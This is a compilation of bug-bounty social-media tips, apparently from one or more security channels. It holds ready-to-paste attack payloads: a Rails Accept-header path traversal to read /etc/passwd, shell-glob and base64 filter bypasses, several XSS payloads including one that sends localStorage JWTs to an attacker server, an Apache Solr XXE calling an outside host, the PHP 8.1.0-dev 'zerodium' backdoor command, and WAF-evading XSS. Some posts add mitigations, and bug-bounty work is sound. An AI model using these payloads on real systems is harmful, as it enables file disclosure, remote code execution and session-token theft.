If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with:

`Accept: ../../../../../../../../../../etc/passwd{{` 

#bugbountytips

If the server is deemed to be vulnerable, but a WAF is present:

`../../../../../../e*c/p*s*d{{`

🚀 HExHTTP: Advanced HTTP Header Testing Tool 🚀

HExHTTP is a Python-based tool designed to analyze HTTP headers for vulnerabilities and identify unusual behaviors in web applications. It's ideal for security researchers and penetration testers.

🌟 Features:

- Perform in-depth tests on HTTP headers.
- Detect potential vulnerabilities and security misconfigurations.
- Support for custom headers, user agents, authentication, and more.

📥 Get Started:

Check out the full details and installation
🔗 https://github.com/c0dejump/HExHTTP

#CyberSecurity #PenTesting #HTTPHeaders #HExHTTP #BugBounty #EthicalHacking #WebSecurity #PythonTools #InfoSec #VulnerabilityTesting

⚠️ Alert ⚠️

CVE-2025-21298 : Windows OLE Remote Code Execution Vulnerability

🔥PoC : https://github.com

🧐 Deep Dive : https://redcytadel.com

🔗 Hunter Link:https://hunter.how

🔍 Query

HUNTER :

product.name="Outlook Web App"

FOFA :

product="Microsoft-Outlook"

📰 Refer:https://securityonline.info

#WINDOWS #Outlook #hunterhow #infosec #infosecurity #OSINT #Vulnerability

A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.

Use shell globbing / wildcard expansion. Here is an example

cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how?

Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.

/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."

/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d

#bugbountytips #hacking

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

🚀 Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#bugbountytips #BugBounty #payload #cybersecurity

🔍 Bystander: Passive Web Vulnerability Detection Tool 🔍

Overview: Bystander is a Chrome extension that passively monitors network requests to identify potential web vulnerabilities directly within your browser. As you browse, Bystander alerts you to any detected security issues, enhancing your web security awareness.

Key Features:

- Vulnerability Detection: Identifies actual web vulnerabilities such as Cross-Site Request Forgery (CSRF) and Clickjacking.

- Code Sink Alerts: Detects potential code injection points, including NoSQL Injection (NoSQLi), Server-Side Template Injection (SSTI), and Server-Side Includes (SSI).

- API Token Leakage: Alerts you if API tokens are exposed during your browsing sessions.

- Personal Identifiable Information (PII) Monitoring: Notifies you of potential leaks of sensitive information like PAN numbers or hash disclosures.

- Insight Gathering: Observes and reports on staging domains, admin dashboards, and other critical elements in frontend code and network traffic.

Installation Steps:

- Download: Clone or download the Bystander repository from GitHub.

- Load Extension: In your Chromium-based browser (e.g., Chrome), navigate to Settings > Extensions and enable Developer Mode.

- Add Bystander: Click on "Load unpacked" and select the Bystander folder you downloaded.

For more detailed information and to access the source code, visit the Bystander GitHub repository:
https://github.com/itsdivyanshjain/Bystander

See an apache solr GET/POST to /select ?

Set the 'q' parameter to the following for an XXE injection:

/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'}

#infosec #cybersec #bugbountytips

If you find PHP 8.1.0-dev then try RCE & SQLi

User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id'); 

#bugbounty #bugbountytips #rce #sqli #cybersecurity

CVE-2024-9047: WordPress File Upload plugin for WordPress is vulnerable to a Path Traversal vulnerability in all versions up to, and including, 4.24.11 via the wfu_file_downloader.php...
exploitfinder.com/dbexploit/expl…

⛏️ Find Leaked Credentials Using Google Chrome dev Tools (The Best Way)

🔗 https://github.com/h4x0r-dz/Leaked-Credentials/

#bugbountytips #bugbounty #infosec #hacker #hacking

🚨CVE-2024-55591: Fortinet FortiOS Authentication Bypass Proof of Concept

🔗: https://github.com/watchtowrlabs...

🚨 Critical Vulnerability Alert: Fortinet FortiOS Authentication Bypass (CVE-2024-55591) 🚨

**Overview:**

A significant security flaw has been identified in Fortinet's FortiOS and FortiProxy systems, allowing remote attackers to gain super-admin privileges without proper authentication. This vulnerability is actively being exploited in the wild. ([FortiGuard](https://www.fortiguard.com/psirt/FG-IR-24-535))

**Technical Details:**

- **Vulnerability ID:** CVE-2024-55591
- **Affected Products:**

- FortiOS versions 7.0.0 through 7.0.16
- FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12

Impact:

Allows attackers to gain super-admin privileges via crafted requests to the Node.js websocket module. ([NVD](https://nvd.nist.gov/vuln/detail/cve-2024-55591))

**Proof of Concept:**

A proof-of-concept (PoC) exploit has been released by watchTowr Labs, demonstrating how this vulnerability can be leveraged to execute commands with super-admin privileges. The PoC is available on GitHub: ([GitHub](https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591)

**Mitigation:**

Fortinet has acknowledged the issue and is expected to release patches. Administrators are advised to monitor official Fortinet communications for updates and apply patches promptly. In the meantime, consider restricting access to management interfaces and implementing network segmentation to mitigate potential exploitation.

quick Linux tip 💡

In Linux, you can use the pgrep command to find the PID of a certain process based on its name, pattern, or other criteria.

$pgrep name

You can also use pidof, but it only works with exact binary names and doesn't support pattern matching.

follow us for more great tips! 🐧😎

#cybersecurity #BugBounty #bugbountytips #linuxtips

🌟 bugbountytip

🌟 403 Sucessfull bypass ✅

🌟 add ../ between two UUID and bypass 403

#BugBounty #bugbountytips #BugHunter #bug #web2 #web3 #ethicalhacking

🚨 XSS Payload : Stealing JWT from Local Storage 🚨

A malicious XSS payload can be used to extract JSON Web Tokens (JWTs) stored in localStorage and send them to an attacker-controlled server. Here's a simple yet dangerous example:

<img src='https://<attacker-server>/yikes?jwt='+JSON.stringify(localStorage);'--!>

🛠 How It Works:

This payload injects an <img> tag into a vulnerable webpage.
The src attribute is set to an attacker's server, appending the contents of localStorage (which may contain JWTs or sensitive data).
When executed, the victim's browser sends their JWTs to the attacker's server.

🔥 Why Is This Dangerous?

Attackers can hijack sessions and gain unauthorized access.
Sensitive tokens (JWT, API keys) can be stolen and misused.
If exploited on an admin panel, attackers might escalate privileges.

🛡 How to Prevent It?

✔️ Use HTTP-Only Cookies: Store authentication tokens in cookies with the HttpOnly and Secure flags to prevent JavaScript access.

✔️ Implement CSP (Content Security Policy): Restrict inline scripts and unauthorized domains.

✔️ Sanitize User Input: Use libraries like DOMPurify to prevent injecting malicious HTML.

✔️ Validate & Escape Data Properly: Ensure user inputs are validated before rendering.

🚀 Stay Secure 🔐

#CyberSecurity #XSS #WebSecurity #EthicalHacking #BugBounty #JWT #PenTesting #InfoSec

🧨 Reflected XSS (RXSS) Payload Alert! 🧨

Reflected XSS (RXSS) vulnerabilities allow attackers to inject and execute malicious scripts by crafting special payloads. Here's a custom payload that triggers a prompt pop-up when injected into a vulnerable web application

💣 Custom Payload:

"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//

🔥 How It Works:

- Breaks out of HTML structure using "></a></td></tr></table>.

- Injects a <script> tag that executes JavaScript.

- Triggers a prompt function, confirming code execution.

⚠️ Potential Dangers:

Can be modified to steal cookies, localStorage, or session tokens.
Attackers can perform actions on behalf of users (CSRF-like behavior).
Could be used to deface websites, spread malware, or execute phishing attacks.

🛡 How to Prevent RXSS?

✔️ Sanitize & Escape User Input: Remove or encode characters like <, >, ", '.

✔️ Use CSP (Content Security Policy): Restrict inline scripts and only allow trusted domains.

✔️ Validate Input on Server & Client Side: Never trust user-generated data.

✔️ Use Security Libraries: Implement DOMPurify or similar libraries to filter untrusted input.

🚀 Stay Safe ! 🔐

#CyberSecurity #RXSS #XSS #WebSecurity #BugBounty #EthicalHacking #InfoSec #PenTesting

🚀 Exploring Privilege Escalation via sudo iptables 🚀

In a recent blog post by Shielder, security researchers delve into two innovative techniques that allow a low-privileged user to escalate their privileges to root by leveraging sudo permissions on iptables and iptables-save.
SHIELDER.COM

Key Takeaways

Injecting Fake /etc/passwd Entries:

By executing iptables and iptables-save with sudo, an attacker can inject a malicious entry into the /etc/passwd file. This is achieved by adding a crafted comment in an iptables rule and then using iptables-save to overwrite the legitimate /etc/passwd file, effectively creating a new user with root privileges.

Exploiting Missing Kernel Modules:

If the system lacks certain kernel modules required by iptables, an attacker can utilize the --modprobe argument to execute arbitrary commands. This method relies on the attacker's ability to run iptables with sudo and the absence of specific kernel modules on the target system.
These findings underscore the importance of carefully managing sudo permissions and ensuring that only trusted users have access to powerful system utilities like iptables. Administrators are advised to review their sudoers configurations and restrict access to such commands to mitigate potential security risks.

For a detailed walkthrough of these techniques, check out the full article: A Journey From sudo iptables To Local Privilege Escalation

🔗 https://www.shielder.com

#CyberSecurity #PrivilegeEscalation #LinuxSecurity #EthicalHacking #InfoSec #PenTesting

🛡 Exclusive AWS WAF Bypass – Works on All Tags (Even <meta>)! 🔥

💡 Bypassing AWS Web Application Firewall (WAF)
using a unique payload that executes JavaScript onmouseover, even in restricted tags like <meta> (but not <input type="hidden">).

🔹 Payload:

<xhzeem attr="--- x="=='='onmouseover=confirm`xhzeem` style="display:block;width:1000px;height:1000px;background:red"> --- ">

⚡️ How It Works:

✅ Uses a *custom HTML tag (`<xhzeem>`) to bypass WAF detection.*
✅ Encapsulates the payload in an *unusual attribute structure.*
✅ The *`onmouseover=confirm('xhzeem')`* triggers when hovered over.
✅ Works on *various HTML tags* (even `<meta>`, `<div>`, `<span>`), making it a powerful *XSS attack vector.*

🚨 Why Is This Dangerous?

🔻 Can be used for *session hijacking, cookie theft, or phishing.*
🔻 AWS WAF may fail to detect this due to *non-standard attribute structures.*
🔻 Possible *bypass for CSP/XSS filters* in misconfigured apps.

🛡 Mitigation Steps:

✔️ Use a strict Content Security Policy (CSP).
✔️ Implement proper input sanitization.
✔️ Don't rely solely on AWS WAF for XSS protection!
✔️ Perform security testing using advanced payloads like this!

🚀 Stay Secure & Test Your WAF Rules!

#CyberSecurity #AWS #WAFBypass #XSS #WebSecurity #BugBounty #EthicalHacking #PenTesting #InfoSec

🔥 Bypassing Security Filters Using Base64 Encoding 🔥

💡 Why didn't we use plain /etc/passwd?
When trying to access sensitive files directly via Local File Inclusion (LFI), the server often detects known patterns (e.g., /etc/passwd) and blocks them with a 403 Forbidden response. However, many filters don’t decode Base64-encoded payloads, allowing us to bypass restrictions.

🚀 Example: Bypassing LFI Restrictions

❌ Blocked Attempt:

url/?f=/etc/passwd  ==> 403 (Forbidden)

🔻 The server has a security mechanism in place to detect and block direct access to sensitive files.

✅ Bypassing with Base64 Encoding:

First, encode /etc/passwd into Base64:

echo -n "/etc/passwd" | base64

🔹 Output: L2V0Yy9wYXNzd2Q=

Then, send the request with the encoded payload:

url/?f=L2V0Yy9wYXNzd2Q=  ==> 200 (Success)

🔹 If the server automatically decodes Base64 before processing the request, it may serve the /etc/passwd file without triggering security filters.

📌 Where Can This Trick Be Used?

🔹 SQL Injection (SQLi):

Some WAFs block ' or -- in queries. By encoding or double-encoding the payload, you can bypass detection.

🔹 Server-Side Template Injection (SSTI):

Certain template engines automatically decode Base64, allowing exploitation through encoded payloads.

🔹 Cross-Site Scripting (XSS):

Some WAFs block <script>. By encoding it, you may bypass the filter and execute the script.

<img src="data:image/svg+xml;base64,PHNjcmlwdD5hbGVydCgneHhzJyk8L3NjcmlwdD4=">

(Decodes to <script>alert('xxs')</script> inside an SVG file)

🔹 Local File Inclusion (LFI):

As shown above, encoding file paths can trick the server into allowing
access.

🔹 Remote File Inclusion (RFI):

Some servers allow including external files when encoded in Base64.

🛡 Mitigation Techniques
🔹 Disable automatic Base64 decoding in web applications.
🔹 Use allowlists instead of blocklists for filtering inputs.
🔹 Enforce strict input validation to reject encoded malicious payloads.
🔹 Monitor logs for unusual Base64 patterns that could indicate an attack.

🔥 Takeaway for Bug Bounty Hunters & Pentesters
✅ Encoding payloads in Base64, double Base64, or URL encoding can help bypass WAFs and security filters.
✅ Always check if the server decodes Base64 before processing input—this can be a goldmine for exploitation.
✅ Combine encoding with other techniques (e.g., double encoding, path traversal, null-byte injection) for better results!

🚀 Stay Curious, Keep Hacking!

#BugBounty #Pentesting #CyberSecurity #EthicalHacking #LFI #XSS #SQLi #SSTI #InfoSec #WAFBypass

🚀 OAuth Logout URL XSS Exploit (CVE-2023-24488) - POC 🚀

💡 Vulnerability: Cross-Site Scripting (XSS) via post_logout_redirect_uri in OAuth endpoint.

💀 Impact: Allows stealing cookies, session hijacking, or phishing attacks on OAuth-based apps.

🔥 POC Payload:

oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E

✔️ What Happens?

The application fails to properly sanitize the post_logout_redirect_uri parameter, allowing injection of line breaks (%0d%0a) and JavaScript execution (<script>alert(document.cookie)</script>).

✔️ Why Is This Dangerous?

Can steal session cookies (if HttpOnly is not enabled).
Phishing attacks by injecting fake login pages.
Account takeover risk if chained with other OAuth flaws.

🛡 How to Prevent It?

✔️ Sanitize and validate redirect URLs (allow only whitelisted domains).
✔️ Encode user input properly to prevent JavaScript execution.
✔️ Enable Content Security Policy (CSP) to block inline scripts.
✔️ Use HttpOnly & Secure cookies to protect sensitive session data.

🕵️‍♂️ Bug Bounty Tip:

🔹 Always check OAuth redirect parameters for XSS & open redirect issues!
🔹 Test post_logout_redirect_uri, redirect_uri, and similar params.
🔹 Try encoding tricks like double URL encoding, newline injection, and HTML entity encoding.

🔗 Stay ahead in bug bounty hunting & penetration testing! 🚀
🚀 Join us for daily tips and more bbh learning 🚀

#InfoSec #CyberSec #BugBountyTips #XSS #OAuth #WebSecurity #EthicalHacking #AppSec #PenTesting